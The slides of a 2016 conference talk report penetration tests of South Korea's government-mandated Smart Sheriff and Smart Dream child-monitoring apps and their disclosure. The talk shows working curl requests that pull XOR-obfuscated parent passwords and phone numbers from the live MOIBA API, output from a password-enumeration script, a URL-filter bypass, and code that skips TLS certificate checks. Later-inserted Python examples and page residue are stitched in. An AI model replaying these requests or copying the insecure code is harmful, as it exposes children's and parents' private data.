Smart Sheriff, Dumb Idea
The wild west of government assisted parenting
presented by:
Abraham Aranguren - @7a_
Fabian Fäßler - @Samuirai
We talk about an app
• Background Information
• Smart Sheriff - 1. Pentest Round
• Smart Sheriff - 2. Pentest Round
• Results
• Smart Dream
• Future work
"In the end we hope you share our disbelief"
Who are we?
Abraham Aranguren (@7a_) - blog.7-a.org
OWASP OWTF Project leader - owtf.org
abraham@cure53.de
Fabian Fäßler (@samuirai) - smrrd.de
fabian@cure53.de
Cure53 is led by handsome Mario Heiderich
(@0x6D6172696F). Bullshit free pentests, sometimes public 
https://cure53.de/#publications
Once upon a time…
… in a country far far away.
South Korea – Smartphone Usage
(Chart: smartphone ownership, % of total population and % of 18-34 y/o population)
Source: Spring 2015 Global Attitudes survey. Q71 & Q72.
… the country with the highest Smartphone usage on the planet!
South Korea – Child Protection Laws
Article 32, Section 7 of Korean Telecommunications Business Act
mobile network operators have to provide adult content filtering
service for legal minors
…
Introduced 15.10.2014
Implementation details, Article 37, Section 8 (introduced 14.04.2015)
Notify children and parents about features of the blocking
Monthly notification if the blocking means was deleted or had not been operated for more than 15 days
…
South Korea – Mandatory apps
Mandatory installation of a surveillance app when the phone is purchased for a teenager.
No opt-out.
Photo: Lee Jin-man/Associated Press
Mobile Internet Business Association
(MOIBA)
The Korean Communications Commission (KCC) gave MOIBA
USD $2.7 million to create these mandatory apps
Why did we do this?
OpenNet Korea brought this to Citizen Lab
http://opennetkorea.org/
Citizen Lab, Toronto
"Citizen Lab Summer Institute on Monitoring Internet Openness and Rights 2015"
http://citizenlab.org/
Open Technology Fund supported it
https://www.opentech.fund/
MOIBA - Smart Sheriff / Smart Dream
MOIBA created 2 mobile apps
Smart Sheriff (in scope):
• Smartphone usage restrictions.
• Block apps.
• Usage time restrictions.
• Security: why do you think we are here?
Smart Dream (Nightmare?) (out of scope):
• SMS/Chat and search monitoring for bad keywords.
• Security: wait till the end
Smart Sheriff: Parent vs. Child mode
(Screenshots: Parent mode, Child mode)
• Operating mode chosen on first usage
• Parent-Mode: Smartphone usage management
• Child-Mode: For filtering and activity monitoring
Smart Sheriff: Block phone access
Parents can deny phone access for certain times for the child.
Smart Sheriff: Installed apps
See installed apps on the child's phone and deny or enable access to them.
Round 1 – Preparations
Language Barrier
WTF DOES THIS?
Language Barrier
unpack, translate, repack
with apktool
http://ibotpeaches.github.io/Apktool/
Debugging
# smali patch: log the object just returned by the previous call under the tag "SAMU"
move-result-object v0
const-string v1, "SAMU"
invoke-static {v1, v0}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
// the same two lines in Java
private static final String TAG = "SAMU";
Log.i(TAG, result);
Patching debug messages into the smali code for easy debugging
Need opcodes? http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
Round 1 – Shoot
// Decompiled Java: the WebView that loads the push-alarm page
String url = "http://ssweb.moiba.or.kr/pushAlarm";   // plain http, see SMS-01-003
WebView webview = (WebView)findViewById(0x7f070000);
webview.getSettings().setJavaScriptEnabled(true);
webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff"); // Java object exposed to page JavaScript
webview.postUrl(url, obj);
// Inside the page, the bridge object is an ordinary JavaScript property:
var String = window.jsinterface.getSomeString();
// window.jsinterface.getClass().forName('java.lang.Runtime')
RCE with insecure WebView
Accessing Java methods from JavaScript in Android 2.4 to 4.1
SMS-01-001
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
String url = "http://ssweb.moiba.or.kr/pushAlarm";
WebView webview = (WebView)findViewById(0x7f070000);
webview.getSettings().setJavaScriptEnabled(true);
webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff");
webview.postUrl(url, obj);
What is SSL?
SMS-01-003
SMS-01-005
moibagtwigsystemsfightinghhhkkkkok
"]5ZWSVAB5]" ↔ "05555215554"
XOR Key: m\x00oibagtw\x00igsyste\x00msfight\x00inghhhk\x00kkkok
SMS-01-018
STORY TIME!
Smart Sheriff – Bully API
SMS-01-018
API
API response with the password (XORed)
Smart Sheriff – Bully API - Pass Leak
SMS-01-018
root@redstar-os $ curl -v -s 'http://api.moiba.or.kr/MessageRequest' \
  --data '{ "action":"CLT_MBR_GETCLIENTMEMBERINFO", "MOBILE_MACHINE_INFO":"XXX",
  "MOBILE":"5ZWSVAA5[", "DEVICE_ID":"unknown" }'
> POST /MessageRequest HTTP/1.1
> Host: api.moiba.or.kr
> User-Agent: curl/7.48.0
> Accept: */*
> Content-Length: 141
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 141 out of 141 bytes
< HTTP/1.1 200 OK
< Date: Sun, 15 Oct 2015 17:05:20 GMT
< Server: Apache/2.0.65 (Unix) DAV/2 mod_jk/1.2.37
< Content-Length: 242
< Content-Type: text/plain; charset=euc-kr
<
{"CHILD_GRADE_TYPE":"","CHILD_BIR_YMD":"","MEMBER_YN":"Y","CHILD_BLCK_GRADE":"","PASSWORD":"2]"
,"PARENT_MOBILE":"5ZWSVAA5[","REGISTRATION_ID":"","DIVN":"PARENT"}
Decoded: PASSWORD "2]" → 1234
Decoded: PARENT_MOBILE "5ZWSVAA5[" → 15555215652
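As an added example (not the authors' script and not the app's code), the round-1 XOR scheme rebuilt from the key on the SMS-01-005 slide and checked against the MOBILE and PASSWORD values in the API response above; it assumes the `\x00` bytes sit where the slide prints them, and it shows why a key baked into the APK gives no confidentiality.

```python
"""XOR obfuscation as used by Smart Sheriff round 1 (SMS-01-005 / SMS-01-018).

Added example, not the authors' or MOIBA's code. It reproduces the scheme
from the key printed on the slide to show why a fixed key shipped inside the
APK gives no confidentiality: XOR is its own inverse, a single known
plaintext/ciphertext pair reveals the key, and key bytes equal to 0x00 leave
the plaintext digit untouched.
"""

# Key from the slide with the "\x00" escapes restored (positions 1, 9, 17, 25, 33).
XOR_KEY = b"m\x00oibagtw\x00igsyste\x00msfight\x00inghhhk\x00kkkok"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key; the key repeats if data is longer."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(plain: str, key: bytes = XOR_KEY) -> str:
    """Turn a digit string into the form sent in the MOBILE / PASSWORD fields."""
    return xor_bytes(plain.encode("ascii"), key).decode("latin-1")


def deobfuscate(obf: str, key: bytes = XOR_KEY) -> str:
    """Inverse of obfuscate: XOR is an involution, so the same key undoes it."""
    return xor_bytes(obf.encode("latin-1"), key).decode("ascii")


def recover_key(plain: str, obf: str) -> bytes:
    """Known-plaintext recovery: plaintext XOR ciphertext == key.

    One pair from the API exchange on the slide (the phone number and the
    MOBILE value) yields every key byte the pair covers; no reversing needed.
    """
    return bytes(p ^ c for p, c in zip(plain.encode("ascii"), obf.encode("latin-1")))


def leaked_positions(key: bytes = XOR_KEY) -> list:
    """Indices whose key byte is 0x00: those plaintext characters travel as is."""
    return [i for i, k in enumerate(key) if k == 0]


if __name__ == "__main__":
    # Values from the slides; the backslashes in the output are the characters
    # the slide rendering dropped.
    for number in ("05555215554", "15555215652", "1234"):
        enc = obfuscate(number)
        print(f"{number!r} -> {enc!r} -> {deobfuscate(enc)!r}")
    print("key bytes recovered from one pair:",
          recover_key("15555215652", obfuscate("15555215652")))
    print("plaintext leaks unchanged at key positions:", leaked_positions())
```

The two '5' digits that every encoded number shows in the clear are the NUL key positions; the fix is not a better key but TLS plus real per-device authentication.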
Smart Sheriff – Bully API
SMS-01-018
Smart Sheriff has so many users that you can find valid phone numbers by just trying random numbers.
root@redstar-os $ python sheriff_raid.py
CHILD : 010XXXXXXXX - pw: 0879 -> parent number: 010XXXXXXXX
CHILD : 010XXXXXXXX - pw: 8493 -> parent number: 010XXXXXXXX
PARENT : 010XXXXXXXX - pw: 8493
PARENT : 010XXXXXXXX - pw: 0878
CHILD : 010XXXXXXXX - pw: 0878 -> parent number: 010XXXXXXXX
PARENT : 010XXXXXXXX - pw: 2580
CHILD : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX
CHILD : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX
PARENT : 010XXXXXXXX - pw: 5912
CHILD : 010XXXXXXXX - pw: 1004 -> parent number: 010XXXXXXXX
PARENT : 010XXXXXXXX - pw: 1004
Smart Sheriff – Bully API - Fake usage
SMS-01-018
API
No authentication for the child application.
There is a DEVICE_ID as session cookie, but most API endpoints simply accept the phone number to perform updates.
Why not? – HTTP Response for Login
root@redstar-os $ curl -X POST http://ssweb.moiba.or.kr/main/ajaxLoginConfirm \
  --data "PNAME=1234&LINKGBN=&PARENTNUM=0102222222"
<script type="text/javascript">
function fn_goMain() {
if ($("#LINKGBN").val() == "NOTICE") {
$("#frmCont").attr("action","/board/boardList");
} else {
$("#frmCont").attr("action","/main/childList");
}
$("#frmCont").submit();
}
// add by his
function fn_goPasswordChange() {
$("#frmCont").attr("action","/main/passwordChange");
$("#frmCont").submit();
}
// the failed-attempt count is rendered into the page as the string literal '3'
if('3' < 5){
alert('3회 비밀번호를 잘못 입력하셨습니다.\n하단의 ‘비밀번호 찾기’를 클릭하세요.');
}else{
alert('비밀번호 5회 이상 오류로 로그인이 제한됩니다.\n고객센터로 문의해주세요(1566-8274)');
}
$("#PARENT").attr("disabled", false);
$("#INPUTP").attr("disabled", false);
</script>
AJAX login response returns HTML <script> tag instead of JSON, XML, ... because … why not?
Why not? – Tomcat 6.0.29 (released 2009)
Why not? – Block websites
function shouldOverrideUrlLoading()…
if(s.startsWith("market://") || s.startsWith("tel:")
   || s.startsWith("http") && !s.contains("ssweb.moiba.or.kr"))
SMS-01-002
blocked:    http://blocked.com
allowed :D  http://blocked.com/?blah=ssweb.moiba.or.kr
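Added example, not the app's code: the same filter written two ways in Python, the substring test the slide shows beside a host-name comparison that parses the URL first. The first two sample URLs are the slide's own; the remaining ones are constructed shapes a URL filter is usually tested against.

```python
"""Host-based allow-list vs. the substring test in shouldOverrideUrlLoading.

Added example, not code from the app. The substring rule on the slide
(SMS-01-002) lets any URL through that merely *contains* ssweb.moiba.or.kr;
the hardened variant parses the URL and compares the real host name.
"""
from urllib.parse import urlsplit

ALLOWED_HOST = "ssweb.moiba.or.kr"


def blocked_by_substring(url: str) -> bool:
    """The http branch of the condition shown on the slide, as written."""
    return url.startswith("http") and ALLOWED_HOST not in url


def blocked_by_hostname(url: str) -> bool:
    """Hardened check (this example's own design): fail closed unless the
    scheme is http(s) and the parsed host is exactly the allowed host."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return True
    if parts.scheme not in ("http", "https"):
        return True
    # hostname is lower-cased and has userinfo ("user@") and the port stripped,
    # so neither "ssweb.moiba.or.kr@evil" nor a look-alike suffix passes.
    return parts.hostname != ALLOWED_HOST


def compare(urls):
    """Return {url: (blocked_by_substring, blocked_by_hostname)}."""
    return {u: (blocked_by_substring(u), blocked_by_hostname(u)) for u in urls}


# First two from the slide; the rest are constructed bypass shapes.
SAMPLES = [
    "http://blocked.com",
    "http://blocked.com/?blah=ssweb.moiba.or.kr",
    "http://ssweb.moiba.or.kr/main/childList",
    "http://ssweb.moiba.or.kr.evil.example/",
    "http://ssweb.moiba.or.kr@evil.example/",
    "javascript:alert(1)",
]

if __name__ == "__main__":
    print("substring | hostname | url")
    for url, (weak, strict) in compare(SAMPLES).items():
        w = "blocked" if weak else "allowed"
        s = "blocked" if strict else "allowed"
        print(f"{w:9} | {s:8} | {url}")
```

The substring rule also never looks at non-http schemes, so a javascript: URL is not blocked by it at all.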
Test and dev. snippets everywhere
Test URLs:
http://api.moiba.or.kr/test/
http://api.moiba.or.kr/aaa/
http://api.moiba.or.kr/aaa2/
…
{"a1":"!@#$%^&*()_+","a2":"/","a3":"","a4":""","a5":"''''"
,"a6":"aaa한글 테스트 ....aaa"}
Big pile of
• XSS
• Unsafe storage of block history on SD card
• Leaking personal data over the API
• SQL Injection in mobile app
• …
Seriously:
https://cure53.de/pentest-report_smartsheriff.pdf
CitizenLab approaches MOIBA
• We gave our report to CitizenLab
• CitizenLab was in contact with MOIBA
• MOIBA made some legal threats in the beginning
⇒ Responsible Disclosure
MOIBA Press Release 1
MOIBA Press Release 2
Citizen Lab publishes the report
Some media attention
… but the reaction was a bit underwhelming
"Thanks for the free pentest!"
It kinda backfired…
Did we just help improve surveillance software?
Round 2
Fixed Stuff
• SMS-01-002 Possible Filter-Bypass via unsafe URL check
• SMS-01-003 No use of any SSL/TLS-based transport security
• SMS-01-004 Test-Page leaks Data and App-Internals
• SMS-01-008 Reflected XSS on ssweb.moiba.or.kr
Smart Sheriff – How to SSL like a man
SMS-02-008
// WebViewClient callback: every certificate error is waved through (SMS-02-008)
public final void onReceivedSslError(WebView paramWebView,
        SslErrorHandler paramSslErrorHandler, SslError paramSslError)
{
    paramSslErrorHandler.proceed();   // load the page despite the invalid certificate
}

// HostnameVerifier that accepts any host name for any certificate
... implements HostnameVerifier {
    public final boolean verify(String paramString, SSLSession paramSSLSession)
    {
        return true;                  // a name mismatch is never rejected
    }
}
Smart Sheriff – Bully API v2.0
SMS-02-009
http://api.moiba.or.kr/MessageRequest
https://api.moiba.or.kr/MessageRequest_New
• New endpoint introduced
• Old endpoint never deprecated – MOIBA lied
"+yld3N...aVIjqteA==" → { "action":"CLT_MBR_GETCL...
"MOBILE":".3ZP[QVDC6]UK@JC",
"DEVICE_ID": ... }
moiba1cybar8smart4sheriff4securi
SMS-01-012
Smart Sheriff – Bully API
SMS-02-009
API
Guess what happened using a different User Agent :D
SMS-02-010
API
No authentication for the child application.
You can still fake the phone usage (kid installs p0rn app)
Smart Sheriff – Bully API v2.0
• They fixed what matters to them (Internal Dev Leaks)
• They did not fix what affected their users (information leaks, no authentication)
Seriously:
https://cure53.de/pentest-report_smartsheriff-2.pdf
Round 2 - Summary
Citizen Lab publishes updated report
MOIBA reacts and pulls the app
News about the app removal
Time to celebrate!
But something is shady…
Did we fail?
Find the difference!
사이버안심존
(Cyber Safety Zone)
스마트보안관
(Smart Sheriff)
The old MOIBA
The new MOIBA
The new MOIBA – Login for Parents
Smart Sheriff / Cyber Safety Zone Smart Dream
Web Interface – Cyber Safety Zone
Smart Sheriff / Cyber Safety Zone
• MOIBA didn't deprecate the API
• MOIBA renamed the app
• MOIBA is trying to hide the issues
But what is up with Smart Dream?
Web Interface – Smart Dream
Smart Dream Nightmare
Parent Child
• Parent-Mode: Check messages and searches containing dangerous words
• Child-Mode: Monitors SMS/KakaoTalk and Google searches; installs as an accessibility service
Smart Dream Nightmare
Parent App
monitoring SMS
Parent Web Backend
Responsible Disclosure?
• MOIBA lied to customers about security fixes.
• Simply rebranding Smart Sheriff (still vulnerable) - and our reports are public
• How can we protect the privacy of the children when MOIBA doesn't fix anything when disclosed in private?
⇒ We will not disclose technical details.
Any research was done with our own test accounts.
Smart Dream Nightmare
XSS via stored messages
+600k Messages from +48k Children
root@redstar-os $ python nightmare.py
### Messages from Child:
From: ".인터넷" (5)
1. [KakaoTalk] (violence/gang up): "투명성성인기회"
2. [KakaoTalk] (blackmail/money): "깡패?"
3. [KakaoTalk] (violence/맞다): "한!!국교!!"
4. [KakaoTalk] (blackmail/빌려달라): "보안어린이개방성사랑정?"
5. [KakaoTalk] (threat/kill): "성인성인괴상한해킹비밀한국성인강남스타일모바일"
From: ".사이버억압♡" (2)
1. [KakaoTalk] (rant/crazy girl acting as child): "투명♥♥"
2. [KakaoTalk] (abuse/fuck it): "비 밀사 이버비?밀번역 조 화정부 기 회개인 성 인 어린이정 ..."
From: "010XXXXXXXX" (3)
1. [SMS] (harass/desperate): "어린이강남스?타일인터넷"
2. [SMS] (harass/): "깡패구글괴상한"
3. [SMS] (harass/desperate): "부패교육감?"
From: ".사이버투♥" (3)
1. [KakaoTalk] (threat/kill): "해킹 평등"
2. [KakaoTalk] (harass/desperate): "자 기 검열보?"
3. [KakaoTalk] (violence/gang up): "강남스타일!!!"
The Most Offensive Slide :O
The 1086 "harmful" words that are monitored by Smart Dream
Another big pile of
• XSS
• Lack of Authentication and Authorization
• Accessing stored messages and searches
• …
• Take a step back
• Imagine these apps were magically 100% secure
• Would you trust any company or government...
• ... to have a database with all that information?
A note for reflection
If you know Korean Security Researchers, Journalists or Activists,
raise awareness.
→ Korean society has to deal with these issues
Have a look at the other child protection applications
and relay results to human rights organizations.
→ perfect project for a university class
Support organizations like
OpenNet Korea, CitizenLab, Open Technology Fund, EFF, …
What‘s next?
I've learned how virtualization works by hiding p0rn inside VMWare in the early 2000s (and never got busted).
Questions/Comments?
Other Korean Child Protection Apps
• SKTelecom: https://play.google.com/store/apps/details?id=com.skt.thug.hazard&hl=ko
• KT Corporation: https://play.google.com/store/apps/details?id=com.kt.ollehkidsafe&hl=ko
• LG U+: https://play.google.com/store/apps/details?id=com.lguplus.cleanmobile&hl=ko
• …
Reports
• [20 September 2015] Are the Kids Alright? Digital Risks to Minors from South Korea's Smart Sheriff Application - https://citizenlab.org/2015/09/digital-risks-south-korea-smart-sheriff/
• [1 November 2015] The Kids are Still at Risk: Update to Citizen Lab's "Are the Kids Alright?" Smart Sheriff report - https://citizenlab.org/2015/11/smart-sheriff-update/
• [21 September 2015] Submission to the 113th Session of the UN Human Rights Committee for Fourth Periodic Report of the Republic of Korea - http://opennetkorea.org/en/wp/wp-content/uploads/2016/03/INT_CCPR__KOR_OPEN_NETSmart-Sheriff.pdf
Some News Articles
• [19 May 2015] Don't text 'beer' in Korea: Words that trigger teen alerts - http://www.japantimes.co.jp/news/2015/05/19/asia-pacific/dont-text-beer-korea-words-trigger-teen-alerts/
• [16 June 2015] South Korea provokes teenage smartphone privacy row - http://www.bbc.com/news/technology-33091990
• [21 September 2015] Smart Sheriff child surveillance app leaves South Korean kids vulnerable to hackers - http://www.cbc.ca/news/technology/smart-sheriff-1.3236682

E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 

[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea. The wild west of government assisted parenting

  • 3. Smart Sheriff, Dumb Idea The wild west of government assisted parenting presented by: Abraham Aranguren - @7a_ Fabian Fäßler - @Samuirai
  • 4. We talk about an app • Background Information • Smart Sheriff - 1. Pentest Round • Smart Sheriff - 2. Pentest Round • Results • Smart Dream • Future work „In the end we hope you share our disbelief“
  • 5. Who are we? Abraham Aranguren (@7a_) - blog.7-a.org OWASP OWTF Project leader - owtf.org abraham@cure53.de Fabian Fäßler (@samuirai) - smrrd.de fabian@cure53.de Cure53 is led by handsome Mario Heiderich (@0x6D6172696F). Bullshit free pentests, sometimes public  https://cure53.de/#publications
  • 6. Once upon a time… … in a country far far away.
  • 7. South Korea – Smartphone Usage % Total population % 18-34 y/o population Source: Spring 2015 Global Attitudes survey. Q71 & Q72. … the country with the highest Smartphone usage on the planet!
  • 8. South Korea – Child Protection Laws Article 32, Section 7 of Korean Telecommunications Business Act mobile network operators have to provide adult content filtering service for legal minors … Introduced 15.10.2014
  • 9. Article 32, Section 7 of Korean Telecommunications Business Act mobile network operators have to provide adult content filtering service for legal minors … Introduced 15.10.2014 Introduced 14.04.2015 Implementation Details Article 37, Section 8 Notify children and parents about features of the blocking Monthly notification if the blocking means was deleted or had not been operated for more than 15 days … South Korea – Child Protection Laws
  • 10. South Korea – Mandatory apps Mandatory installation of a surveillance app when the phone is purchased for a teenager.
  • 11. South Korea – Mandatory apps Mandatory installation of a surveillance app when the phone is purchased for a teenager. No opt-out.
  • 12. South Korea – Mandatory apps Photo: Lee Jin-man/Associated Press
  • 13. Mobile Internet Business Association (MOIBA) The Korean Communications Commission (KCC) gave MOIBA USD $2.7 million to create these mandatory apps
  • 14. Why did we do this? OpenNet Korea brought this to Citizen Lab http://opennetkorea.org/ Citizen Lab, Toronto "Citizen Lab Summer Institute on Monitoring Internet Openness and Rights 2015“ http://citizenlab.org/ Open Technology Fund supported it https://www.opentech.fund/
  • 15. MOIBA - Smart Sheriff / Smart Dream. MOIBA created two mobile apps: Smart Sheriff (in scope) and Smart Dream (Nightmare?) (out of scope). Smart Sheriff: smartphone usage restrictions, blocking apps, usage time restrictions – security: why do you think we are here? Smart Dream: SMS/chat and search monitoring for bad keywords – security: wait till the end.
  • 16. Smart Sheriff: Parent vs. Child mode Parent Child • Operating mode chosen on first usage • Parent-Mode: Smartphone usage management • Child-Mode: For filtering and activity monitoring
  • 17. Smart Sheriff: Block phone access Parents can deny phone access for certain times for the child
  • 18. Smart Sheriff: Installed apps See installed apps on child’s phone and deny or enable access to them.
  • 19. Round 1 – Preparations
  • 21. Language Barrier unpack, translate, repack with apktool http://ibotpeaches.github.io/Apktool/
  • 24. Debugging: patching debug messages into the smali code for easy debugging. Need opcodes? http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
        Java:
          private static final String TAG = "SAMU";
          Log.i(TAG, result);
        smali:
          move-result-object v0
          const-string v1, "SAMU"
          invoke-static {v1, v0}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
  • 25. Round 1 – Shoot
  • 26. RCE with insecure WebView (SMS-01-001): accessing Java methods from JavaScript in Android 2.4 to 4.1
        String url = "http://ssweb.moiba.or.kr/pushAlarm";
        WebView webview = (WebView)findViewById(0x7f070000);
        webview.getSettings().setJavaScriptEnabled(true);
        webview.addJavascriptInterface(new JavaScriptInterface(), "SmartSheriff");
        webview.postUrl(url, obj);

        var String = window.jsinterface.getSomeString();
        // window.jsinterface.getClass().forName('java.lang.Runtime')
      https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
      https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
  • 27. What is SSL? (SMS-01-003) – the same WebView snippet as on slide 26: the push-alarm page is loaded over plain http://ssweb.moiba.or.kr
  • 34. Smart Sheriff – Bully API SMS-01-018 API
  • 38. Smart Sheriff – Bully API SMS-01-018 API API response with the password (XORed)
  • 39. Smart Sheriff – Bully API - Pass Leak (SMS-01-018)
        root@redstar-os $ curl -v -s 'http://api.moiba.or.kr/MessageRequest' --data '{ "action":"CLT_MBR_GETCLIENTMEMBERINFO", "MOBILE_MACHINE_INFO":"XXX", "MOBILE":"5ZWSVAA5[", "DEVICE_ID":"unknown" }'
        > POST /MessageRequest HTTP/1.1
        > Host: api.moiba.or.kr
        > User-Agent: curl/7.48.0
        > Accept: */*
        > Content-Length: 141
        > Content-Type: application/x-www-form-urlencoded
        >
        * upload completely sent off: 141 out of 141 bytes
        < HTTP/1.1 200 OK
        < Date: Sun, 15 Oct 2015 17:05:20 GMT
        < Server: Apache/2.0.65 (Unix) DAV/2 mod_jk/1.2.37
        < Content-Length: 242
        < Content-Type: text/plain; charset=euc-kr
        <
        {"CHILD_GRADE_TYPE":"","CHILD_BIR_YMD":"","MEMBER_YN":"Y","CHILD_BLCK_GRADE":"","PASSWORD":"2]","PARENT_MOBILE":"5ZWSVAA5[","REGISTRATION_ID":"","DIVN":"PARENT"}
      Decoded (the values are only XOR-obfuscated): PASSWORD "2]" → 1234; MOBILE "5ZWSVAA5[" → 15555215652
  • 40. Smart Sheriff – Bully API (SMS-01-018) Smart Sheriff has so many users that you can find valid phone numbers by just trying random numbers.
        root@redstar-os $ python sheriff_raid.py
        CHILD  : 010XXXXXXXX - pw: 0879 -> parent number: 010XXXXXXXX
        CHILD  : 010XXXXXXXX - pw: 8493 -> parent number: 010XXXXXXXX
        PARENT : 010XXXXXXXX - pw: 8493
        PARENT : 010XXXXXXXX - pw: 0878
        CHILD  : 010XXXXXXXX - pw: 0878 -> parent number: 010XXXXXXXX
        PARENT : 010XXXXXXXX - pw: 2580
        CHILD  : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX
        CHILD  : 010XXXXXXXX - pw: 2580 -> parent number: 010XXXXXXXX
        PARENT : 010XXXXXXXX - pw: 5912
        CHILD  : 010XXXXXXXX - pw: 1004 -> parent number: 010XXXXXXXX
        PARENT : 010XXXXXXXX - pw: 1004
  • 41. Smart Sheriff – Bully API - Fake usage SMS-01-018 API No authentication for the child application. There is a DEVICE_ID as session cookie, but most API endpoints simply accept the phone number to perform updates.
  • 42. Why not? – HTTP Response for Login. The AJAX login response returns an HTML <script> tag instead of JSON, XML, ... because … why not?
        root@redstar-os $ curl -X POST http://ssweb.moiba.or.kr/main/ajaxLoginConfirm --data "PNAME=1234&LINKGBN=&PARENTNUM=0102222222"
        <script type="text/javascript">
        function fn_goMain() {
            if ($("#LINKGBN").val() == "NOTICE") {
                $("#frmCont").attr("action","/board/boardList");
            } else {
                $("#frmCont").attr("action","/main/childList");
            }
            $("#frmCont").submit();
        }
        // add by his
        function fn_goPasswordChange() {
            $("#frmCont").attr("action","/main/passwordChange");
            $("#frmCont").submit();
        }
        if('3' < 5){
            alert('3회 비밀번호를 잘못 입력하셨습니다.\n하단의 ‘비밀번호 찾기’를 클릭하세요.');
        }else{
            alert('비밀번호 5회 이상 오류로 로그인이 제한됩니다.\n고객센터로 문의해주세요(1566-8274)');
        }
        $("#PARENT").attr("disabled", false);
        $("#INPUTP").attr("disabled", false);
        </script>
  • 43. Why not? – Tomcat 6.0.29 (released 2009)
  • 44. Why not? – Block websites (SMS-01-002)
        function shouldOverrideUrlLoading()…
          if(s.startsWith("market://") || s.startsWith("tel:") || s.startsWith("http") && !s.contains("ssweb.moiba.or.kr"))
      blocked:    http://blocked.com
      allowed :D  http://blocked.com/?blah=ssweb.moiba.or.kr
  • 45. Test and dev. snippets everywhere
        {"a1":"!@#$%^&*()_+","a2":"/","a3":"","a4":"\"","a5":"''''","a6":"aaa한글 테스트 ....aaa"}
      Test URLs: http://api.moiba.or.kr/test/ http://api.moiba.or.kr/aaa/ http://api.moiba.or.kr/aaa2/ …
  • 46. Big pile of
      • XSS
      • Unsafe storage of block history on SD card
      • Leaking personal data over the API
      • SQL Injection in mobile app
      • …
      Seriously: https://cure53.de/pentest-report_smartsheriff.pdf
  • 47. CitizenLab approaches MOIBA • We gave our report to CitizenLab • CitizenLab was in contact with MOIBA • MOIBA made some legal threats in the beginning ⇒ Responsible Disclosure
